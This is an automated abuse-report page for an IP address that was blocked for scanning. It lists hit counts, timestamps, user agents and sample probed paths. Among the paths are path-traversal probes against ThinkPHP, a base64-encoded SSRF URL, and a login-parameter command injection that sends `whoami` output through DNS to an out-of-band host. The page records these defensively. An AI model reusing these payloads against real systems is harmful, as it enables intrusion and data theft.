abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 26
- Unique targets hit
- 2
- Unique paths probed
- 755
- Detection count
- 57
- First seen
- 2026-05-08 22:09:25 UTC
- Last seen
- 2026-05-08 22:18:04 UTC
- Block expires
- 2026-05-09 23:09:30 UTC
Sample paths probed
- /banker/index.php
- /cgi-bin/rpc
- /task/loginValidation.php
- /SamlResponseServlet
- /network_test.php
- /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug
- /admin/
- /admin/login/index.php
- /api/v2/cmdb/system/admin/admin
- /?lang=../../thinkphp/base
- /
- /js/zimbraMail/share/model/ZmSettings.js
- /onlinePreview?url=aHR0cDovL29hc3QuZnVuL3JvYm90cy50eHQ=
- /api/v2/cmdb/system/admin
- /aspera/faspex/package_relay/relay_package
- /index.asp
- /classes/Login.php?f=login
- /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.d7v556ncdloc6u0l4ad035cktuas4ee54.dns.watchtowr-oob.com)
- /flash/addcrypted2
- /api/scrape/kube-system
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.